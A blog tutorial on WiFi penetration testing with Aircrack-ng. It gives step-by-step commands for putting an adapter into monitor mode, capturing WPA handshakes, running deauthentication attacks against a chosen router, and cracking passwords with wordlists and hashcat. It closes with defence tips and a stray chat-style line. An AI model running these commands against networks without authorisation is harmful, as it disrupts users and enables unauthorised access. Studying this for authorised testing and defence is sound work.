WiFi Hacking Using Aircrack-ng

on

 


WiFi Pentesting Using Aircrack-ng

Introduction

WiFi penetration testing is an essential skill for ethical hackers and cybersecurity professionals. Aircrack-ng is one of the most popular tools used for testing WiFi security by capturing and cracking WPA/WPA2 passwords. This guide will walk you through the process of WiFi penetration testing using Aircrack-ng.

Disclaimer: This tutorial is for educational purposes only. Testing networks without permission is illegal.

Prerequisites

Before starting, ensure you have:

  • A Linux-based OS (Kali Linux, Parrot OS, or Ubuntu with Aircrack-ng installed).
  • A WiFi adapter that supports monitor mode & packet injection (e.g., Alfa AWUS036NHA, TP-Link TL-WN722N v1).
  • Basic knowledge of Linux commands and networking.

Step 1: Install Aircrack-ng

If you don’t have it installed, run:

sudo apt update && sudo apt install aircrack-ng

Verify installation:

aircrack-ng --help

Step 2: Enable Monitor Mode

First, list all network interfaces:

sudo airmon-ng

Put your WiFi adapter into monitor mode:

sudo airmon-ng start wlan0

Check if monitor mode is enabled:

sudo iwconfig

Your WiFi interface should now be wlan0mon.

Step 3: Scan for Available Networks

Start scanning for WiFi networks:

sudo airodump-ng wlan0mon

This will display:

BSSID (MAC Address of router)
Channel (CH)
Encryption Type (WPA/WPA2/WEP)
Signal Strength (PWR)

Step 4: Capture Handshake (WPA/WPA2)

Focus on a specific network using:

sudo airodump-ng -c <channel> --bssid <BSSID> -w capture wlan0mon

Replace:

<channel> with the WiFi channel.
<BSSID> with the target’s MAC address.

Now, wait for a WPA handshake to be captured. If no clients are connecting, force a deauthentication attack to speed up the process:

sudo aireplay-ng -0 10 -a <BSSID> wlan0mon

Once the handshake is captured, you will see a [ WPA handshake: BSSID ] message.

Step 5: Crack the WiFi Password

Use a wordlist (like rockyou.txt) to brute-force the handshake:

sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <BSSID> capture-01.cap

If the password is in the wordlist, Aircrack-ng will crack it.

Alternative: Using Hashcat for Faster Cracking

Convert the capture file to hccapx format:

sudo aircrack-ng capture-01.cap -J capture

Then use Hashcat with GPU:

hashcat -m 2500 capture.hccapx /usr/share/wordlists/rockyou.txt --force

Defending Against WiFi Attacks

To protect your WiFi network:

  • Use a Strong Password – At least 12+ characters with symbols.
  • Disable WPS – WPS is vulnerable to brute-force attacks.
  • Enable MAC Filtering – Allow only trusted MAC addresses.
  • Use WPA3 Encryption – If your router supports it.
  • Monitor for Rogue Devices – Regularly check connected devices.

Conclusion

Aircrack-ng is a powerful tool for ethical hacking and WiFi penetration testing. By following this guide, you’ve learned how to capture handshakes, perform deauthentication attacks, and crack passwords. Always use this knowledge responsibly and ethically.

Want more hacking tutorials? Stay tuned for more advanced pentesting guides!

Let me know if you want to add more advanced techniques! 🚀

Comments

Post a Comment